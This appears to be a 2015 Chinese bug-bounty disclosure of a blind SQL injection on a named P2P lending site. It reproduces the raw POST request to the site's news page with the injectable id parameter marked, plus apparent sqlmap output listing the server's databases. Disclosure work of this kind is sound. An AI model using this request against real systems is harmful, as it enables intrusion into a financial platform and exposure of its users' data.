漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

金融服务商安全之某大型P2P平台高危SQL注入漏洞

详细说明:

安心贷(www.anxin.com)是君安信(北京)科技有限公司的独立品牌。安心贷成立于2011年,是中国较早开始运营的P2P网贷平台。
安心贷以金融从业者严谨务实的态度,逐步发展起来。安心贷是最早一批对于投资人进行风险保障的平台,并始终要求借款人用资产进行超额抵押。通过严格的风控,安心贷成为中国网贷行业违约率最低的平台之一。
安心贷拥有一支精通金融理财、互联网技术和政策法规的专业队伍。本着“高效,低调,求真,务实”的宗旨,不断提升交易安全等级和服务质量,赢得了良好的用户口碑,帮助急需融资发展的小微企业和个体工商从业者获得融资贷款, 成为国内知名品牌。
安心贷是安全、透明、稳定、高效的互联网金融平台,致力于利用互联网的便捷高效的特点,整合行业优质资源,为小微企业主和投资理财人士提供高质量的金融信息对接服务。

漏洞证明:

漏洞post请求:

POST /news/ HTTP/1.1
Host: www.anxin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=qp500e55w4oajv45xqqs5gj0; Hm_lvt_ebd37b04edd1e0fceaa52dc641b8ff6f=1436851621; Hm_lpvt_ebd37b04edd1e0fceaa52dc641b8ff6f=1436851621; sgsa_id=anxin.com|1436851621314228; sgsa_vt_187935_192889=1436851621313; CNZZDATA1252986781=1940739559-1436847216-%7C1436847216
X-Forwarded-For: 203.88.211.41
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
id=1*


过滤不严,可以盲注
Result:

[01:25:17] [INFO] fetching database names
[01:25:17] [INFO] fetching number of databases
[01:25:17] [INFO] resumed: 7
[01:25:17] [INFO] resumed: AnxinExt
[01:25:17] [INFO] resumed: master
[01:25:17] [INFO] resumed: model
[01:25:17] [INFO] resumed: msdb
[01:25:17] [INFO] resumed: ReportServer
[01:25:17] [INFO] resumed: ReportServerTempDB
[01:25:17] [INFO] resumed: tempdb
available databases [7]:
[*] AnxinExt
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

修复方案:

标签: none

评论已关闭